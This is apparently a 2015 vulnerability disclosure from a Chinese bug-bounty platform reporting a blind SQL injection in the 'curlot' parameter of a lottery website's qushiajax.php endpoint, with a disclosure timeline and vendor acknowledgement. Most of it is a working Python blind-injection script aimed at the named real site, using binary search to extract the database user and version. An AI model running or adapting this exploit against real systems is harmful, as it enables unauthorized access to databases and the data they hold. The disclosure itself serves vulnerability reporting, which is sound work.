2015-05-04: 细节已通知厂商并且等待厂商处理中 2015-05-04: 厂商已经确认,细节仅向厂商公开 2015-05-14: 细节向核心白帽子及相关领域专家公开 2015-05-24: 细节向普通白帽子公开 2015-06-03: 细节向实习白帽子公开 2015-06-18: 细节向公众公开
MariaDB盲注,root账户.
http://www.17500.cn/tools/qushiajax.phppost data: nourl=true&lotid=fc3d&curlot=2015091&qi=20
参数curlot存在注入:
验证脚本
#coding=utf-8import sys,urllib2import threadingfrom multiprocessing.dummy import Poolfrom multiprocessing.dummy import Lockfrom optparse import OptionParserfrom urllib2 import Request,urlopen,URLError,HTTPErrorimport urllibdef request(URL, data): user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } req = urllib2.Request(URL, None, user_agent) try: request = urllib2.urlopen(req, data) except HTTPError, e: if e.code == 500: return 'Runtime Error' except URLError, e: print('[!] We failed to reach a server.') print('[!] Reason: ' + str(e.reason)) sys.exit(1) return request.read()def binary_sqli(left, right, index): global result while 1: mid = (left + right)/2 if mid == left: lock.acquire() result[index-1]= chr(mid) sys.stdout.write('\r%s' % 'concat(user(),0x3a,@@version): '+''.join(result)) sys.stdout.flush() lock.release() break payload = "2015091 and 1=if(ascii(substring(concat(user(),0x3a,@@version),%s,1))<%s,1,2)" % (index, mid) param = {'nourl':'true', 'lotid':'fc3d', 'qi':'1', 'curlot': payload} html = request('http://www.17500.cn/tools/qushiajax.php', urllib.urlencode(param)) verify = '2015-04-07' if verify in html: right = mid else: left = middef multi_run_wrapper(args): return binary_sqli(*args) if __name__ == '__main__': result=list('*'*50) lock=Lock() args = [] for i in range(1,50): args.append((32, 127, i)) pool = Pool(10) out = pool.map(multi_run_wrapper, args) pool.close() pool.join()
过滤.
危害等级:低
漏洞Rank:3
确认时间:2015-05-04 17:13
谢谢提供漏洞信息,我们尽快修复。
暂无
